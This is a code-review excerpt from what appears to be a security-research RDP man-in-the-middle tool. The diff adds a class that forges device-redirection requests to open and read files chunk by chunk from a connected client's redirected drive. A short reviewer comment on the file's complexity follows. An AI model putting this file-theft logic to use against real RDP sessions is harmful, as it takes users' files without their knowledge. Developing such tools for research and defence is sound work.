pyrdp/mitm/DeviceRedirectionMITM.py

```diff
@@ -322,16 +253,285 @@ def handleCloseResponse(self, request: DeviceCloseRequestPDU, _: DeviceIORespons
+                self.handlers[response.majorFunction](response)
+
+        def onCreateResponse(self, response: DeviceCreateResponsePDU):
+            if response.ioStatus == 0:
+                self.fileID = response.fileID
+
+        def onCloseResponse(self, _: DeviceCloseResponsePDU):
+            self.complete()
+
+
+    class ForgedFileReadRequest(ForgedRequest):
+        def __init__(self, deviceID: int, requestID: int, mitm: 'DeviceRedirectionMITM', path: str):
+            """
+            :param deviceID: ID of the device used.
+            :param requestID: this request's ID.
+            :param mitm: the parent MITM.
+            :param path: path of the file to download.
+            """
+            super().__init__(deviceID, requestID, mitm)
+            self.path = path
+            self.handlers[MajorFunction.IRP_MJ_READ] = self.onReadResponse
+            self.offset = 0
+
+        def send(self):
+            # Open the file
+            request = DeviceCreateRequestPDU(
+                self.deviceID,
+                0,
+                self.requestID,
+                0,
+                FileAccessMask.FILE_READ_DATA,
+                0,
+                FileAttributes.FILE_ATTRIBUTE_NONE,
+                FileShareAccess(7), # read, write, delete
+                FileCreateDisposition.FILE_OPEN,
+                FileCreateOptions.FILE_NON_DIRECTORY_FILE,
+                self.path
+            )
+
+            self.sendIORequest(request)
+
+        def sendReadRequest(self):
+            request = DeviceReadRequestPDU(
+                self.deviceID,
+                self.fileID,
+                self.requestID,
+                0,
+                1024 * 16,
+                self.offset
+            )
+
+            self.sendIORequest(request)
+
+        def onCreateResponse(self, response: DeviceCreateResponsePDU):
+            super().onCreateResponse(response)
+
+            if self.fileID is None:
+                self.handleFileComplete(response.ioStatus)
+                return
+
+            self.sendReadRequest()
+
+        def onReadResponse(self, response: DeviceReadResponsePDU):
+            if response.ioStatus != 0:
+                self.handleFileComplete(response.ioStatus)
+                return
+
+            length = len(response.payload)
+
+            if length == 0:
+                self.handleFileComplete(0)
+                return
+
+            self.mitm.observer.onFileDownloadResult(self.deviceID, self.requestID, self.path, self.offset, response.payload)
+
+            self.offset += length
+            self.sendReadRequest()
+
+        def handleFileComplete(self, error: int):
+            self.mitm.observer.onFileDownloadComplete(self.deviceID, self.requestID, self.path, error)
+
+            if self.fileID is None:
+                self.complete()
+            else:
+                self.sendCloseRequest()
+
+
+
+    class ForgedDirectoryListingRequest(ForgedRequest):
```

Comment:
I'm pretty sure that's the most complex file we have, because of the protocol. It's still only about 500 lines though, which isn't that bad IMO. Once you understand the basics of the DeviceRedirectionMITM (first ~300 lines), I think understanding what the rest is about isn't that hard. It's just classes for handling the forged directory listing / file read requests.